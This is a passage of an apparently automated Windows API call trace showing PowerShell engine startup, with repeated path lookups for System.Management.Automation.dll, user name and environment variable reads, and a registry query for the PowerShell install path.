lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.378] GetLastError () returned 0xcb [0053.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x14e59c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.378] GetLastError () returned 0xcb [0053.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.379] GetLastError () returned 0xcb [0053.379] SetErrorMode (uMode=0x1) returned 0x1 [0053.379] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x29f9de8 | out: lpFileInformation=0x29f9de8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x4a39a190, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x4a39a190, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0053.379] GetLastError () returned 0xcb [0053.379] SetErrorMode (uMode=0x1) returned 0x1 [0053.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.380] GetLastError () returned 0xcb [0053.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.380] GetLastError () returned 0xcb [0053.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.380] GetLastError () returned 0xcb [0053.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.380] GetLastError () returned 0xcb [0053.414] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358040, nSize=0x14ec58 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x14ec58) returned 0x1 [0053.414] GetLastError () returned 0xcb [0053.415] GetUserNameW (in: lpBuffer=0x3175c0, pcbBuffer=0x14ec60 | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x14ec60) returned 1 [0053.415] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x22ddf70*="Available", lpRawData=0x22dde2c) returned 1 [0053.415] GetLastError () returned 0x0 [0053.415] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.416] GetLastError () returned 0xcb [0053.416] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.416] GetLastError () returned 0xcb [0053.417] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0053.417] GetLastError () returned 0xcb [0053.417] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="\\Users\\BGC6u8Oy yXGxkR") returned 0x16 [0053.417] GetLastError () returned 0xcb [0053.417] GetCurrentProcessId () returned 0xb44 [0053.418] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ebec | out: phkResult=0x14ebec*=0x328) returned 0x0 [0053.418] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ec34, lpData=0x0, lpcbData=0x14ec30*=0x0 | out: lpType=0x14ec34*=0x1, lpData=0x0, lpcbData=0x14ec30*=0x56) returned 0x0 [0053.418] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ec34, lpData=0x3175c0, lpcbData=0x14ec30*=0x56 | out: lpType=0x14ec34*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14ec30*=0x56) returned 0x0 [0053.418] RegCloseKey (hKey=0x328) returned 0x0 [0053.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e6dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.418] GetLastError () returned 0xcb [0053.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e68c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.418] GetLastError () returned 0xcb [0053.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e68c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.418] GetLastError () returned 0xcb [0053.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e6c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.418] GetLastError () returned 0xcb [0053.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e674, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.418] GetLastError () returned 0xcb [0053.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e674, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.418] GetLastError () returned 0xcb [0053.438] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.438] GetLastError () returned 0xcb [0053.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.438] GetLastError () returned 0xcb [0053.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.438] GetLastError () returned 0xcb [0053.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.438] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.442] GetLastError () returned 0xcb [0053.442] GetFullPathNameW (in: 